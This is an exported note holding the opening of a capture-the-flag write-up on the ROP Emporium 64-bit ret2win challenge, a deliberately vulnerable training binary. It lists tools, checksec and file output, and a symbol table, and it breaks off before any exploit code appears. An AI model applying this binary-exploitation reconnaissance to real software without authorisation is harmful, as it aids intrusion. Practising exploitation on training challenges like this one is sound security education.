
				<!DOCTYPE html>
				<html>
					<head>
						<meta charset="UTF-8">
						<meta name="viewport" content="width=device-width, initial-scale=1.0">
						<link rel="stylesheet" href="../css/main.css"></head>
						<link rel="stylesheet" href="pluginAssets/katex/katex.css"><script type="application/javascript" src="pluginAssets/mermaid/mermaid.min.js"></script><script type="application/javascript" src="pluginAssets/mermaid/mermaid_render.js"></script><link rel="stylesheet" href="pluginAssets/highlight.js/atom-one-light.css">
						<title>ropemporium-ret2win-64bit</title>
					</head>
					<body>
						<div class="exported-note"><div class="exported-note-title">ropemporium-ret2win-64bit</div>

<style>
		/* https://necolas.github.io/normalize.css/ */
		html{line-height:1.15;-ms-text-size-adjust:100%;-webkit-text-size-adjust:100%}body{margin:0}
		article,aside,footer,header,nav,section{display:block}h1{font-size:2em;margin:.67em 0}hr{box-sizing:content-box;height:0;overflow:visible}
		pre{font-family:monospace,monospace;font-size:1em}a{background-color:transparent;-webkit-text-decoration-skip:objects}
		b,strong{font-weight:bolder}small{font-size:80%}img{border-style:none}

		body {
			font-size: 15px;
			color: #32373F;
			word-wrap: break-word;
			line-height: 1.6em;
			background-color: #ffffff;
			font-family: 'Avenir', 'Arial', sans-serif;
			padding-bottom: 0px;
			padding-top: 0px;
		}
		strong {
			color: #000000;
		}
		kbd {
			border: 1px solid rgb(220, 220, 220);
			box-shadow: inset 0 -1px 0 rgb(220, 220, 220);
			padding: 2px 4px;
			border-radius: 3px;
			background-color: rgb(243, 243, 243);
		}
		::-webkit-scrollbar {
			width: 7px;
			height: 7px;
		}
		::-webkit-scrollbar-corner {
			background: none;
		}
		::-webkit-scrollbar-track {
			border: none;
		}
		::-webkit-scrollbar-thumb {
			background: rgba(100, 100, 100, 0.3); 
			border-radius: 5px;
		}
		::-webkit-scrollbar-track:hover {
			background: rgba(0, 0, 0, 0.1); 
		}
		::-webkit-scrollbar-thumb:hover {
			background: rgba(100, 100, 100, 0.7); 
		}

		/* Remove top padding and margin from first child so that top of rendered text is aligned to top of text editor text */

		#rendered-md > h1:first-child,
		#rendered-md > h2:first-child,
		#rendered-md > h3:first-child,
		#rendered-md > h4:first-child,
		#rendered-md > ul:first-child,
		#rendered-md > ol:first-child,
		#rendered-md > table:first-child,
		#rendered-md > blockquote:first-child,
		#rendered-md > img:first-child,
		#rendered-md > p:first-child {
			margin-top: 0;
			padding-top: 0;
		}
		
		p, h1, h2, h3, h4, h5, h6, ul, table {
			margin-top: .6em;
			margin-bottom: .65em;

			/*
				Adds support for RTL text in the note body. It automatically detects the direction using the content.
				Issue: https://github.com/laurent22/joplin/issues/3991
			*/
			unicode-bidi: plaintext;
		}
		h1, h2, h3, h4, h5, h6 {
			line-height: 1.5em;
		}
		h1 {
			font-size: 1.5em;
			font-weight: bold;
			border-bottom: 1px solid #dddddd;
			padding-bottom: .3em;
		}
		h2 {
			font-size: 1.3em;
			font-weight: bold;
			padding-bottom: .1em; */
		}
		h3 {
			font-size: 1.1em;
		}
		h4, h5, h6 {
			font-size: 1em;
			font-weight: bold;
		}

		.exported-note-title {
			font-size: 2em;
			font-weight: bold;
			margin-bottom: 0.8em;
			line-height: 1.5em;
			padding-bottom: .35em;
			border-bottom: 1px solid #dddddd;
		}

		a {
			color: #155BDA;
		}
		ul, ol {
			padding-left: 0;
			margin-left: 1.7em;
		}
		li {
			margin-bottom: .4em;
		}
		li p {
			margin-top: 0.2em;
			margin-bottom: 0;
		}

		.resource-icon {
			display: inline-block;
			position: relative;
			top: 0.3em;
			text-decoration: none;
			width: 1.2em;
			height: 1.4em;
			margin-right: 0.4em;
			background-color:  #155BDA;
		}
    /* These icons are obtained from the wonderful ForkAwesome project by copying the src svgs 
     * into the css classes below.
     * svgs are obtained from https://github.com/ForkAwesome/Fork-Awesome/tree/master/src/icons/svg
     * instead of the svg width, height property you must use a viewbox here, 0 0 1536 1792 is typically the actual size of the icon
     * each line begins with the pre-amble -webkit-mask: url("data:image/svg+xml;utf8,
     * and of course finishes with ");
     * to precvent artifacts it is also necessary to include -webkit-mask-repeat: no-repeat;
     * on the following line
     * */
		.fa-joplin {
			/* Awesome Font file */
			-webkit-mask: url("data:image/svg+xml;utf8,<svg viewBox='0 0 1536 1792' xmlns='http://www.w3.org/2000/svg'><path d='M373.834 128C168.227 128 0 296.223 0 501.834v788.336C0 1495.778 168.227 1664 373.834 1664h788.336c205.608 0 373.83-168.222 373.83-373.83V501.834C1536 296.224 1367.778 128 1162.17 128zm397.222 205.431h417.424a7.132 7.132 0 0 1 7.132 7.133v132.552c0 4.461-3.619 8.073-8.077 8.073h-57.23c-24.168 0-43.768 19.338-44.284 43.374v2.377h-.017v136.191h-.053l-.466 509.375c-5.02 77.667-39.222 149.056-96.324 201.046-60.28 54.834-141.948 85.017-229.962 85.017-12.45 0-25.208-.61-37.907-1.785-92.157-8.682-181.494-48.601-251.662-112.438-71.99-65.517-117.147-150.03-127.164-238-11.226-98.763 23.42-192.783 95.045-257.937 81.99-74.637 198.185-101.768 316.613-75.704 5.574 1.227 9.55 6.282 9.55 11.997v199.52c-.199 2.625-1.481 6.599-8.183 2.896-.663-.365-1.194-.511-1.653-.531-21.987-10.587-45.159-17.57-68.559-19.916-.38-.04-.757-.124-1.138-.163-.537-.048-1.034-.033-1.556-.075-4.13-.354-8.183-.517-12.203-.58-.87-.011-1.771-.127-2.641-.127-.486 0-.951.05-1.437.057-1.464.011-2.886.115-4.33.163-2.76.102-5.497.211-8.182.448-.273.024-.547.07-.835.097-25.509 2.4-47.864 11.104-65.012 25.47-.954.802-1.974 1.53-2.9 2.36a1.34 1.34 0 0 1-.168.146c-23.96 21.8-34.881 53.872-30.726 90.316 4.62 40.737 26.94 81.156 62.841 113.823 35.908 32.67 80.335 52.977 125.113 57.186 35.118 3.36 66.547-3.919 89.899-20.461a97.255 97.255 0 0 0 9.365-7.501c2.925-2.661 5.569-5.5 8.086-8.416.3-.348.672-.673.975-1.024 8.253-9.864 14.222-21.067 17.996-33.148.639-2.034 1.051-4.148 1.564-6.227.381-1.563.81-3.106 1.112-4.693.555-2.784.923-5.632 1.253-8.49.086-.709.183-1.414.237-2.128.492-4.893.693-9.858.55-14.91h.013V521.623c-2.01-22.626-20.78-40.434-43.928-40.434h-57.23a8.071 8.071 0 0 1-8.077-8.073V340.564a7.132 7.132 0 0 1 7.136-7.133z'/></svg>");
		}
		.fa-file-image {
			-webkit-mask: url("data:image/svg+xml;utf8,<svg viewBox='0 0 1536 1792' xmlns='http://www.w3.org/2000/svg'><path d='M1468 380c37 37 68 111 68 164v1152c0 53-43 96-96 96H96c-53 0-96-43-96-96V96C0 43 43 0 96 0h896c53 0 127 31 164 68zm-444-244v376h376c-6-17-15-34-22-41l-313-313c-7-7-24-16-41-22zm384 1528V640H992c-53 0-96-43-96-96V128H128v1536h1280zm-128-448v320H256v-192l192-192 128 128 384-384zm-832-192c-106 0-192-86-192-192s86-192 192-192 192 86 192 192-86 192-192 192z'/></svg>");
      -webkit-mask-repeat: no-repeat;
		}
		.fa-file-pdf {
			-webkit-mask: url("data:image/svg+xml;utf8,<svg viewBox='0 0 1536 1792' xmlns='http://www.w3.org/2000/svg'><path d='M1468 380c37 37 68 111 68 164v1152c0 53-43 96-96 96H96c-53 0-96-43-96-96V96C0 43 43 0 96 0h896c53 0 127 31 164 68zm-444-244v376h376c-6-17-15-34-22-41l-313-313c-7-7-24-16-41-22zm384 1528V640H992c-53 0-96-43-96-96V128H128v1536h1280zm-514-593c25 20 53 38 84 56 42-5 81-7 117-7 67 0 152 8 177 49 7 10 13 28 2 52-1 1-2 3-3 4v1c-3 18-18 38-71 38-64 0-161-29-245-73-139 15-285 46-392 83-103 176-182 262-242 262-10 0-19-2-28-7l-24-12c-3-1-4-3-6-5-5-5-9-16-6-36 10-46 64-123 188-188 8-5 18-2 23 6 1 1 2 3 2 4 31-51 67-116 107-197 45-90 80-178 104-262-32-109-42-221-24-287 7-25 22-40 42-40h22c15 0 27 5 35 15 12 14 15 36 9 68-1 3-2 6-4 8 1 3 1 5 1 8v30c-1 63-2 123-14 192 35 105 87 190 146 238zm-576 411c30-14 73-57 137-158-75 58-122 124-137 158zm398-920c-10 28-10 76-2 132 3-16 5-31 7-44 2-17 5-31 7-43 1-3 2-5 4-8-1-1-1-3-2-5-1-18-7-29-13-36 0 2-1 3-1 4zm-124 661c88-35 186-63 284-81-10-8-20-15-29-23-49-43-93-103-127-176-19 61-47 126-83 197-15 28-30 56-45 83zm646-16c-5-5-31-24-140-24 49 18 94 28 124 28 9 0 14 0 18-1 0-1-1-2-2-3z'/></svg>");
      -webkit-mask-repeat: no-repeat;
		}
		.fa-file-word {
			-webkit-mask: url("data:image/svg+xml;utf8,<svg viewBox='0 0 1536 1792' xmlns='http://www.w3.org/2000/svg'><path d='M1468 380c37 37 68 111 68 164v1152c0 53-43 96-96 96H96c-53 0-96-43-96-96V96C0 43 43 0 96 0h896c53 0 127 31 164 68zm-444-244v376h376c-6-17-15-34-22-41l-313-313c-7-7-24-16-41-22zm384 1528V640H992c-53 0-96-43-96-96V128H128v1536h1280zM233 768v107h70l164 661h159l128-485c5-15 8-30 10-46 1-8 2-16 2-24h4l3 24c3 14 4 30 9 46l128 485h159l164-661h70V768h-300v107h90l-99 438c-4 16-6 33-7 46l-2 21h-4c0-6-2-14-3-21-3-13-5-30-9-46L825 768H711l-144 545c-4 16-5 33-8 46l-4 21h-4l-2-21c-1-13-3-30-7-46l-99-438h90V768H233z'/></svg>");
      -webkit-mask-repeat: no-repeat;
		}
		.fa-file-powerpoint {
			-webkit-mask: url("data:image/svg+xml;utf8,<svg viewBox='0 0 1536 1792' xmlns='http://www.w3.org/2000/svg'><path d='M1468 380c37 37 68 111 68 164v1152c0 53-43 96-96 96H96c-53 0-96-43-96-96V96C0 43 43 0 96 0h896c53 0 127 31 164 68zm-444-244v376h376c-6-17-15-34-22-41l-313-313c-7-7-24-16-41-22zm384 1528V640H992c-53 0-96-43-96-96V128H128v1536h1280zm-992-234v106h327v-106h-93v-167h137c43 0 82-2 118-15 90-31 146-124 146-233s-54-193-137-228c-38-15-84-19-130-19H416v107h92v555h-92zm353-280H650V882h120c35 0 62 6 83 18 36 21 56 62 56 115 0 56-20 99-62 120-21 10-47 15-78 15z'/></svg>");
      -webkit-mask-repeat: no-repeat;
		}
		.fa-file-excel {
			-webkit-mask: url("data:image/svg+xml;utf8,<svg viewBox='0 0 1536 1792' xmlns='http://www.w3.org/2000/svg'><path d='M1468 380c37 37 68 111 68 164v1152c0 53-43 96-96 96H96c-53 0-96-43-96-96V96C0 43 43 0 96 0h896c53 0 127 31 164 68zm-444-244v376h376c-6-17-15-34-22-41l-313-313c-7-7-24-16-41-22zm384 1528V640H992c-53 0-96-43-96-96V128H128v1536h1280zm-979-234v106h281v-106h-75l103-161c12-19 18-34 21-34h2c1 4 3 7 5 10 4 8 10 14 17 24l107 161h-76v106h291v-106h-68l-192-273 195-282h67V768H828v107h74l-103 159c-12 19-21 34-21 33h-2c-1-4-3-7-5-10-4-7-9-14-17-23L648 875h76V768H434v107h68l189 272-194 283h-68z'/></svg>");
      -webkit-mask-repeat: no-repeat;
		}
		.fa-file-audio {
			-webkit-mask: url("data:image/svg+xml;utf8,<svg viewBox='0 0 1536 1792' xmlns='http://www.w3.org/2000/svg'><path d='M1468 380c37 37 68 111 68 164v1152c0 53-43 96-96 96H96c-53 0-96-43-96-96V96C0 43 43 0 96 0h896c53 0 127 31 164 68zm-444-244v376h376c-6-17-15-34-22-41l-313-313c-7-7-24-16-41-22zm384 1528V640H992c-53 0-96-43-96-96V128H128v1536h1280zM620 850c12 5 20 17 20 30v544c0 13-8 25-20 30-4 1-8 2-12 2-8 0-16-3-23-9l-166-167H288c-18 0-32-14-32-32v-192c0-18 14-32 32-32h131l166-167c10-9 23-12 35-7zm417 689c19 0 37-8 50-24 83-102 129-231 129-363s-46-261-129-363c-22-28-63-32-90-10-28 23-32 63-9 91 65 80 100 178 100 282s-35 202-100 282c-23 28-19 68 9 90 12 10 26 15 40 15zm-211-148c17 0 34-7 47-20 56-60 87-137 87-219s-31-159-87-219c-24-26-65-27-91-3-25 24-27 65-2 91 33 36 52 82 52 131s-19 95-52 131c-25 26-23 67 2 91 13 11 29 17 44 17z'/></svg>");
      -webkit-mask-repeat: no-repeat;
		}
		.fa-file-video {
			-webkit-mask: url("data:image/svg+xml;utf8,<svg viewBox='0 0 1536 1792' xmlns='http://www.w3.org/2000/svg'><path d='M1468 380c37 37 68 111 68 164v1152c0 53-43 96-96 96H96c-53 0-96-43-96-96V96C0 43 43 0 96 0h896c53 0 127 31 164 68zm-444-244v376h376c-6-17-15-34-22-41l-313-313c-7-7-24-16-41-22zm384 1528V640H992c-53 0-96-43-96-96V128H128v1536h1280zM768 768c70 0 128 58 128 128v384c0 70-58 128-128 128H384c-70 0-128-58-128-128V896c0-70 58-128 128-128h384zm492 2c12 5 20 17 20 30v576c0 13-8 25-20 30-4 1-8 2-12 2-8 0-17-3-23-9l-265-266v-90l265-266c6-6 15-9 23-9 4 0 8 1 12 2z'/></svg>");
      -webkit-mask-repeat: no-repeat;
		}
		.fa-file-archive {
			-webkit-mask: url("data:image/svg+xml;utf8,<svg viewBox='0 0 1536 1792' xmlns='http://www.w3.org/2000/svg'><path d='M640 384V256H512v128h128zm128 128V384H640v128h128zM640 640V512H512v128h128zm128 128V640H640v128h128zm700-388c37 37 68 111 68 164v1152c0 53-43 96-96 96H96c-53 0-96-43-96-96V96C0 43 43 0 96 0h896c53 0 127 31 164 68zm-444-244v376h376c-6-17-15-34-22-41l-313-313c-7-7-24-16-41-22zm384 1528V640H992c-53 0-96-43-96-96V128H768v128H640V128H128v1536h1280zM781 943c85 287 107 349 107 349 5 17 8 34 8 52 0 111-108 192-256 192s-256-81-256-192c0-18 3-35 8-52 0 0 21-62 120-396V768h128v128h79c29 0 54 19 62 47zm-141 465c71 0 128-29 128-64s-57-64-128-64-128 29-128 64 57 64 128 64z'/></svg>");
      -webkit-mask-repeat: no-repeat;
		}
		.fa-file-code {
			-webkit-mask: url("data:image/svg+xml;utf8,<svg viewBox='0 0 1536 1792' xmlns='http://www.w3.org/2000/svg'><path d='M1468 380c37 37 68 111 68 164v1152c0 53-43 96-96 96H96c-53 0-96-43-96-96V96C0 43 43 0 96 0h896c53 0 127 31 164 68zm-444-244v376h376c-6-17-15-34-22-41l-313-313c-7-7-24-16-41-22zm384 1528V640H992c-53 0-96-43-96-96V128H128v1536h1280zM480 768c11-14 31-17 45-6l51 38c14 11 17 31 6 45l-182 243 182 243c11 14 8 34-6 45l-51 38c-14 11-34 8-45-6l-226-301c-8-11-8-27 0-38zm802 301c8 11 8 27 0 38l-226 301c-11 14-31 17-45 6l-51-38c-14-11-17-31-6-45l182-243-182-243c-11-14-8-34 6-45l51-38c14-11 34-8 45 6zm-620 461c-18-3-29-20-26-37l138-831c3-18 20-29 37-26l63 10c18 3 29 20 26 37l-138 831c-3 18-20 29-37 26z'/></svg>");
      -webkit-mask-repeat: no-repeat;
		}
		.fa-file-alt, .fa-file-csv {
      /* fork-awesome doesn't have csv so we use the text icon */
			-webkit-mask: url("data:image/svg+xml;utf8,<svg viewBox='0 0 1536 1792' xmlns='http://www.w3.org/2000/svg'><path d='M1468 380c37 37 68 111 68 164v1152c0 53-43 96-96 96H96c-53 0-96-43-96-96V96C0 43 43 0 96 0h896c53 0 127 31 164 68zm-444-244v376h376c-6-17-15-34-22-41l-313-313c-7-7-24-16-41-22zm384 1528V640H992c-53 0-96-43-96-96V128H128v1536h1280zM384 800c0-18 14-32 32-32h704c18 0 32 14 32 32v64c0 18-14 32-32 32H416c-18 0-32-14-32-32v-64zm736 224c18 0 32 14 32 32v64c0 18-14 32-32 32H416c-18 0-32-14-32-32v-64c0-18 14-32 32-32h704zm0 256c18 0 32 14 32 32v64c0 18-14 32-32 32H416c-18 0-32-14-32-32v-64c0-18 14-32 32-32h704z'/></svg>");
      -webkit-mask-repeat: no-repeat;
		}
		.fa-file {
			-webkit-mask: url("data:image/svg+xml;utf8,<svg viewBox='0 0 1536 1792' xmlns='http://www.w3.org/2000/svg'><path d='M1468 380c37 37 68 111 68 164v1152c0 53-43 96-96 96H96c-53 0-96-43-96-96V96C0 43 43 0 96 0h896c53 0 127 31 164 68zm-444-244v376h376c-6-17-15-34-22-41l-313-313c-7-7-24-16-41-22zm384 1528V640H992c-53 0-96-43-96-96V128H128v1536h1280z'/></svg>");
      -webkit-mask-repeat: no-repeat;
		}
		blockquote {
			border-left: 4px solid rgb(220, 220, 220);
			padding-left: 1.2em;
			margin-left: 0;
			opacity: .7;
		}

		.jop-tinymce table,
		table {
			text-align: left;
			border-collapse: collapse;
			border: 1px solid rgb(220, 220, 220);
			background-color: #ffffff;
		}

		.jop-tinymce table td, .jop-tinymce table th,
		table td, th {
			text-align: left;
			padding: .5em 1em .5em 1em;
			font-size: 15;
			color: #32373F;
			font-family: 'Avenir', 'Arial', sans-serif;
		}

		.jop-tinymce table td,
		table td {
			border: 1px solid rgb(220, 220, 220);
		}

		.jop-tinymce table th,
		table th {
			border: 1px solid rgb(220, 220, 220);
			border-bottom: 2px solid rgb(220, 220, 220);
			background-color: rgb(247, 247, 247);
		}

		.jop-tinymce table tr:nth-child(even),
		table tr:nth-child(even) {
			background-color: rgb(247, 247, 247);
		}

		.jop-tinymce table tr:hover,
		table tr:hover {
			background-color: #e5e5e5;
		}

		hr {
			border: none;
			border-bottom: 2px solid #dddddd;
		}
		img {
			max-width: 100%;
			height: auto;
		}
		
		.inline-code,
		.mce-content-body code {
			border: 1px solid rgb(220, 220, 220);
			background-color: rgb(243, 243, 243);
			padding-right: .2em;
			padding-left: .2em;
			border-radius: .25em;
			color: rgb(0,0,0);
			font-size: .9em;
		}

		.highlighted-keyword {
			background-color: #F3B717;
			color: black;
		}

		.not-loaded-resource img {
			width: 1.15em;
			height: 1.15em;
			background: white;
			padding: 2px !important;
			border-radius: 2px;
			box-shadow: 0 1px 3px #000000aa;
		}

		a.not-loaded-resource img {
			margin-right: .2em;
		}

		a.not-loaded-resource {
			display: flex;
			flex-direction: row;
			align-items: center;
		}

		.md-checkbox input[type=checkbox]:checked {
			opacity: 0.7;
		}

		.jop-tinymce ul.joplin-checklist .checked,
		.md-checkbox .checkbox-label-checked {
			opacity: 0.5;
		}

		.exported-note {
			padding: 1em;
		}

		.joplin-editable .joplin-source {
			display: none;
		}

		mark {
			background: #F7D26E;
			color: black;
		}

		/* =============================================== */
		/* For TinyMCE */
		/* =============================================== */

		.mce-content-body {
			/* Note: we give a bit more padding at the bottom, to allow scrolling past the end of the document */
			padding: 5px 10px 10em 0;
		}

		/*
		.mce-content-body code {
			background-color: transparent;
		}
		*/

		.mce-content-body [data-mce-selected=inline-boundary] {
			background-color: transparent;
		}

		.mce-content-body .joplin-editable {
			cursor: pointer !important;
		}

		.mce-content-body.mce-content-readonly {
			opacity: 0.5;
		}

		/* We need that to make sure click events have the A has a target */
		.katex a span {
			pointer-events: none;
		}

		.media-player {
			width: 100%;
			margin-top: 10px;
		}

		.media-player.media-pdf {
			min-height: 100vh;
		}

		/* Clear the CODE style if the element is within a joplin-editable block */
		.mce-content-body .joplin-editable code {
			border: none;
			background: none;
			padding: 0;
			color: inherit;
			font-size: inherit;
		}

		/* =============================================== */
		/* For TinyMCE */
		/* =============================================== */

		@media print {
			body {
				height: auto !important;
			}

			pre {
				white-space: pre-wrap;
			}

			.code, .inline-code {
				border: 1px solid #CBCBCB;
			}

			#joplin-container-content {
				/* The height of the content is set dynamically by JavaScript (in updateBodyHeight) to go
				   around various issues related to scrolling. However when printing we don't want this
				   fixed size as that would crop the content. So we set it to auto here. "important" is
				   needed to override the style set by JavaScript at the element-level. */
				height: auto !important;
			}
		}
	

				/*
					FOR THE MARKDOWN EDITOR
				*/

				/* Remove the indentation from the checkboxes at the root of the document
				   (otherwise they are too far right), but keep it for their children to allow
				   nested lists. Make sure this value matches the UL margin. */

				li.md-checkbox {
					list-style-type: none;
				}

				li.md-checkbox input[type=checkbox] {
					margin-left: -1.71em;
					margin-right: 0.7em;
				}
				
				ul.joplin-checklist {
					list-style:none;
				}

				/*
					FOR THE RICH TEXT EDITOR
				*/

				ul.joplin-checklist li::before {
					content:"\f14a";
					font-family:"Font Awesome 5 Free";
					background-size: 16px 16px;
					pointer-events: all;
					cursor: pointer;
					width: 1em;
					height: 1em;
					margin-left: -1.3em;
					position: absolute;
					color: #32373F;
				}

				.joplin-checklist li:not(.checked)::before {
					content:"\f0c8";
				}
.mermaid { background-color: white; width: 640px; }</style><div id="rendered-md"><p>#weird-machines #rop-gadget</p>
<h1 id="ropemporium-ret2win-64bit">ropemporium - ret2win 64bit</h1>
<p><a data-from-md title='https://github.com/aditya0x80/' href='https://github.com/aditya0x80/'>https://github.com/aditya0x80/</a><br>
<a data-from-md title='https://github.com/aditya0x80/writeups/blob/main/ropemporium/ret2win.py' href='https://github.com/aditya0x80/writeups/blob/main/ropemporium/ret2win.py'>https://github.com/aditya0x80/writeups/blob/main/ropemporium/ret2win.py</a></p>
<h2 id="tools">Tools</h2>
<ul>
<li>ropgadget</li>
<li>gdb-peda</li>
<li>ghidra</li>
<li>python - pwntool</li>
</ul>
<h4 id="this-is-a-write-up-on-ropempriums-64bit-ret2win-challenge-the-challenge-includes-a-straightforward-ret2win-binary-file">This is a write-up on ropemprium's 64bit ret2win challenge. The challenge includes a straightforward ret2win binary file.</h4>
<ul>
<li>Here we can see that <code class="inline-code">nx</code> is enabled so we cant inject a shellcode</li>
</ul>
<div class="joplin-editable"><pre class="joplin-source" data-joplin-language="" data-joplin-source-open="```&#10;" data-joplin-source-close="&#10;```">﯇ checksec ret2win 
[*] '/home/pwn0x80/Documents/ctfs/rop/ret2wins/ret2win'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
</pre><pre class="hljs"><code><span class="hljs-string">﯇</span> <span class="hljs-string">checksec</span> <span class="hljs-string">ret2win</span> 
[<span class="hljs-string">*</span>] <span class="hljs-string">&#x27;/home/pwn0x80/Documents/ctfs/rop/ret2wins/ret2win&#x27;</span>
    <span class="hljs-attr">Arch:</span>     <span class="hljs-string">amd64-64-little</span>
    <span class="hljs-attr">RELRO:</span>    <span class="hljs-string">Partial</span> <span class="hljs-string">RELRO</span>
    <span class="hljs-attr">Stack:</span>    <span class="hljs-literal">No</span> <span class="hljs-string">canary</span> <span class="hljs-string">found</span>
    <span class="hljs-attr">NX:</span>       <span class="hljs-string">NX</span> <span class="hljs-string">enabled</span>
    <span class="hljs-attr">PIE:</span>      <span class="hljs-literal">No</span> <span class="hljs-string">PIE</span> <span class="hljs-string">(0x400000)</span>
</code></pre></div>
<p><img src="_resources/7657332b84044b328c9b317ab9445162.png" alt="8f3a87b3ae91ae35cfe56d0970c4f51d.png"></p>
<ul>
<li>using <code class="inline-code">file</code> command we can see it is a not stripped ELF binary</li>
</ul>
<div class="joplin-editable"><pre class="joplin-source" data-joplin-language="" data-joplin-source-open="```&#10;" data-joplin-source-close="&#10;```">file ret2win 
ret2win: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=19abc0b3bb228157af55b8e16af7316d54ab0597, not stripped</pre><pre class="hljs"><code><span class="hljs-attribute">file</span> ret<span class="hljs-number">2</span>win 
<span class="hljs-attribute">ret2win</span>: ELF <span class="hljs-number">64</span>-bit LSB executable, x<span class="hljs-number">86</span>-<span class="hljs-number">64</span>, version <span class="hljs-number">1</span> (SYSV), dynamically linked, interpreter /lib<span class="hljs-number">64</span>/ld-linux-x<span class="hljs-number">86</span>-<span class="hljs-number">64</span>.so.<span class="hljs-number">2</span>, for GNU/Linux <span class="hljs-number">3</span>.<span class="hljs-number">2</span>.<span class="hljs-number">0</span>, BuildID[sha<span class="hljs-number">1</span>]=<span class="hljs-number">19</span>abc<span class="hljs-number">0</span>b<span class="hljs-number">3</span>bb<span class="hljs-number">228157</span>af<span class="hljs-number">55</span>b<span class="hljs-number">8</span>e<span class="hljs-number">16</span>af<span class="hljs-number">7316</span>d<span class="hljs-number">54</span>ab<span class="hljs-number">0597</span>, not stripped</code></pre></div>
<h2 id="static-analysis">static analysis</h2>
<ul>
<li>
<ul>
<li>It has three important local functions for which we must investigate further. <code class="inline-code">00000000004006e8 pwnme</code>, <code class="inline-code">0000000000400756 ret2win</code>  &amp;  <code class="inline-code">0000000000400697 main</code></li>
</ul>
</li>
</ul>
<div class="joplin-editable"><pre class="joplin-source" data-joplin-language="" data-joplin-source-open="```&#10;" data-joplin-source-close="&#10;```">Symbol table '.symtab' contains 69 entries:
   Num:    Value          Size Type    Bind   Vis      Ndx Name
     0: 0000000000000000     0 NOTYPE  LOCAL  DEFAULT  UND 
     1: 0000000000400238     0 SECTION LOCAL  DEFAULT    1 
     2: 0000000000400254     0 SECTION LOCAL  DEFAULT    2 
     3: 0000000000400274     0 SECTION LOCAL  DEFAULT    3 
     4: 0000000000400298     0 SECTION LOCAL  DEFAULT    4 
     5: 00000000004002c0     0 SECTION LOCAL  DEFAULT    5 
     6: 00000000004003b0     0 SECTION LOCAL  DEFAULT    6 
     7: 0000000000400416     0 SECTION LOCAL  DEFAULT    7 
     8: 0000000000400430     0 SECTION LOCAL  DEFAULT    8 
     9: 0000000000400450     0 SECTION LOCAL  DEFAULT    9 
    10: 0000000000400498     0 SECTION LOCAL  DEFAULT   10 
    11: 0000000000400528     0 SECTION LOCAL  DEFAULT   11 
    12: 0000000000400540     0 SECTION LOCAL  DEFAULT   12 
    13: 00000000004005b0     0 SECTION LOCAL  DEFAULT   13 
    14: 00000000004007f4     0 SECTION LOCAL  DEFAULT   14 
    15: 0000000000400800     0 SECTION LOCAL  DEFAULT   15 
    16: 0000000000400958     0 SECTION LOCAL  DEFAULT   16 
    17: 00000000004009a8     0 SECTION LOCAL  DEFAULT   17 
    18: 0000000000600e10     0 SECTION LOCAL  DEFAULT   18 
    19: 0000000000600e18     0 SECTION LOCAL  DEFAULT   19 
    20: 0000000000600e20     0 SECTION LOCAL  DEFAULT   20 
    21: 0000000000600ff0     0 SECTION LOCAL  DEFAULT   21 
    22: 0000000000601000     0 SECTION LOCAL  DEFAULT   22 
    23: 0000000000601048     0 SECTION LOCAL  DEFAULT   23 
    24: 0000000000601058     0 SECTION LOCAL  DEFAULT   24 
    25: 0000000000000000     0 SECTION LOCAL  DEFAULT   25 
    26: 0000000000000000     0 FILE    LOCAL  DEFAULT  ABS crtstuff.c
    27: 00000000004005f0     0 FUNC    LOCAL  DEFAULT   13 deregister_tm_clones
    28: 0000000000400620     0 FUNC    LOCAL  DEFAULT   13 register_tm_clones
    29: 0000000000400660     0 FUNC    LOCAL  DEFAULT   13 __do_global_dtors_aux
    30: 0000000000601060     1 OBJECT  LOCAL  DEFAULT   24 completed.7698
    31: 0000000000600e18     0 OBJECT  LOCAL  DEFAULT   19 __do_global_dtor[...]
    32: 0000000000400690     0 FUNC    LOCAL  DEFAULT   13 frame_dummy
    33: 0000000000600e10     0 OBJECT  LOCAL  DEFAULT   18 __frame_dummy_in[...]
    34: 0000000000000000     0 FILE    LOCAL  DEFAULT  ABS ret2win.c
    35: 00000000004006e8   110 FUNC    LOCAL  DEFAULT   13 pwnme
    36: 0000000000400756    27 FUNC    LOCAL  DEFAULT   13 ret2win
    37: 0000000000000000     0 FILE    LOCAL  DEFAULT  ABS crtstuff.c
    38: 0000000000400ae4     0 OBJECT  LOCAL  DEFAULT   17 __FRAME_END__
    39: 0000000000000000     0 FILE    LOCAL  DEFAULT  ABS 
    40: 0000000000600e18     0 NOTYPE  LOCAL  DEFAULT   18 __init_array_end
    41: 0000000000600e20     0 OBJECT  LOCAL  DEFAULT   20 _DYNAMIC
    42: 0000000000600e10     0 NOTYPE  LOCAL  DEFAULT   18 __init_array_start
    43: 0000000000400958     0 NOTYPE  LOCAL  DEFAULT   16 __GNU_EH_FRAME_HDR
    44: 0000000000601000     0 OBJECT  LOCAL  DEFAULT   22 _GLOBAL_OFFSET_TABLE_
    45: 00000000004007f0     2 FUNC    GLOBAL DEFAULT   13 __libc_csu_fini
    46: 0000000000601058     8 OBJECT  GLOBAL DEFAULT   24 stdout@@GLIBC_2.2.5
    47: 0000000000601048     0 NOTYPE  WEAK   DEFAULT   23 data_start
    48: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND puts@@GLIBC_2.2.5
    49: 0000000000601058     0 NOTYPE  GLOBAL DEFAULT   23 _edata
    50: 00000000004007f4     0 FUNC    GLOBAL DEFAULT   14 _fini
    51: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND system@@GLIBC_2.2.5
    52: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND printf@@GLIBC_2.2.5
    53: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND memset@@GLIBC_2.2.5
    54: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND read@@GLIBC_2.2.5
    55: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND __libc_start_mai[...]
    56: 0000000000601048     0 NOTYPE  GLOBAL DEFAULT   23 __data_start
    57: 0000000000000000     0 NOTYPE  WEAK   DEFAULT  UND __gmon_start__
    58: 0000000000601050     0 OBJECT  GLOBAL HIDDEN    23 __dso_handle
    59: 0000000000400800     4 OBJECT  GLOBAL DEFAULT   15 _IO_stdin_used
    60: 0000000000400780   101 FUNC    GLOBAL DEFAULT   13 __libc_csu_init
    61: 0000000000601068     0 NOTYPE  GLOBAL DEFAULT   24 _end
